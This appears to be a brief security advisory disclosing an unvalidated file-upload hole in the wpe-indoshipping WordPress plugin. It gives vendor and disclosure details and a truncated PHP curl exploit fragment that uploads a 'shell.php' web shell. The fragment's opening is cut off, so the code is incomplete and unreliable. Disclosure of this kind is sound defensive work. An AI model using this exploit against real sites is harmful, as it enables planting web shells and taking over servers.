VDB-ID: 145 Title: Remote file upload vulnerability in wpe-indoshipping v2.5.0 wordpress plugin [Previously Discovered] Vulnerability Date: 2015-07-13 Download: https://wordpress.org/plugins/wpe-indoshipping Vendor: http://www.balitechy.com/ Notified: 2015-07-13 Vendor Contact: ekaputra[at]balitechy.com Description: Indonesian shipping special plugins to integrate with the plugin WP - Ecommerce. The final test at the WP - Ecommerce version 3.8.11.1 With WPE Indoshipping then you can display a list of postage per area in Indonesia that you choose . Suitable to display a list of postage from JNE , TIKI or the other and will directly affect the value of your order . Vulnerability: The ./wpe-indoshipping/admin/upload-file.php doesn't validate the users ability to upload files or the type of file being uploaded. 1 The attacker will need to guess the path to a writeable directory in the web servers root. CVE-IDs: Exploit: "@$uploadfile",'upload_path'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'shell.php')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> URL: http://www.vapidlabs.com/advisory.php?v= Credit: Larry W. Cashdollar, @_larry0